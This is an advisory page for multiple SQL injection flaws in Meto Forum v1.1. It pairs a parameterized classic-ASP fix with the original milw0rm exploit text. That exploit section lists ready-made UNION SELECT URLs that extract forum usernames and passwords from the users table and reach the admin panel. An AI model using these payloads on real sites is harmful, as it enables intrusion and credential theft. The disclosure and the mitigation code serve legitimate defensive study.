Vendor: Meto Forum v1.1
By: Ugur Can Engin
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Meto Forum v1.1
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:meto_forum:meto_forum_v1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Meto Forum v1.1 Multiple Remote SQL Injection Vulnerable

Meto Forum v1.1 is vulnerable to multiple remote SQL injection attacks. Attackers can exploit this vulnerability to gain access to the admin panel and steal all user passwords. The vulnerable files are kategori.asp, admin_kategori.asp, duzenle.asp, admin_oku.asp, uye.asp, and oku.asp.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
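The following is an added illustration of that mitigation for the stack this advisory describes (classic ASP over an Access database); it is not code from Meto Forum or from the original advisory. It replaces the string-concatenation pattern behind a page like kategori.asp with a strict integer check on the `kid` query-string value plus an ADODB.Command parameter, so the value can never change the SQL text. The table and column names (`kategoriler`, `baslik`) and the database path are assumed placeholders.

```asp
<%
' Added example (hypothetical): parameterized category lookup for kategori.asp.
' Vulnerable pattern this replaces (assumed, do not use):
'   "SELECT ... FROM kategoriler WHERE kid=" & Request.QueryString("kid")
Option Explicit

' Returns the query-string value as a Long if it is a plain, non-negative
' integer of at most 9 digits; otherwise returns Empty. A regular expression is
' used instead of IsNumeric, which also accepts forms such as "1e5" or "&H1F".
Function SafeIntParam(name)
    Dim raw, re
    raw = Request.QueryString(name)
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If re.Test(raw) Then
        SafeIntParam = CLng(raw)
    Else
        SafeIntParam = Empty
    End If
End Function

Dim kid, conn, cmd, rs
kid = SafeIntParam("kid")
If IsEmpty(kid) Then
    ' Reject anything that is not a bare integer, e.g. "20 union select ...".
    Response.Status = "400 Bad Request"
    Response.Write "Invalid category id."
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
' Assumed database location; adjust to the real .mdb path.
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("db/forum.mdb")

' The SQL text is fixed; the value travels as a typed parameter (?).
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT kid, baslik FROM kategoriler WHERE kid = ?"
cmd.CommandType = 1 ' adCmdText
' CreateParameter(Name, Type, Direction, Size, Value): 3 = adInteger, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("kid", 3, 1, , kid)

Set rs = cmd.Execute
Do Until rs.EOF
    ' Encode output so stored data cannot inject HTML either.
    Response.Write Server.HTMLEncode(rs("baslik")) & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The same two steps (reject non-integer input, bind the value as a parameter) apply to the `id` parameters of the other files listed in the advisory.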

Exploit-DB raw data:

---------------------------------------------------------------

Meto Forum v1.1 Multiple Remote SQL Injection Vulnerable

Script : http://www.aspindir.com/goster/5444

Risk   : All users' saved passwords in the forum can be taken.

Coded : ASP , SQL Language = 'Access'

---------------------------------------------------------------


EIP [1] Exploit:


http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test


Log in to the admin panel > cookie saved.
This script file has a SQL injection attack.


http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1  2,3,4,5,6


http://localhost:2222/lab/MetoForumV1/forum/admin/duzenle.asp?id=1+union+select+0,kullanici,parola,3,4,5,1+from+uyeler



http://localhost:2222/lab/MetoForumV1/forum/admin_oku.asp?id=1%20union%20select%200,1,2,3,4,5,1,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,7,8,9,1,1,1,1%20from%20uyeler



[ESP][2]

Other files that have a SQL injection attack:

uye.asp 
oku.asp

---------------------------------------------------------------



Discovered By U238 |Ugur Can Engin |

Web - Designer Developer Solutions

setuid.noexec0x1[at[hotmail[d0t]com

pgp key --> http://ugurcan.by.ru/U238.asc

Friends --> < Teyfik Cevik - ka0x - The_BekiR - Erhan Bulut - Caborz - Nettoxic - fahn - ZeberuS >

I salute Mustafa Kemal Ataturk, the greatest and wisest leader in the world.

# milw0rm.com [2008-05-13]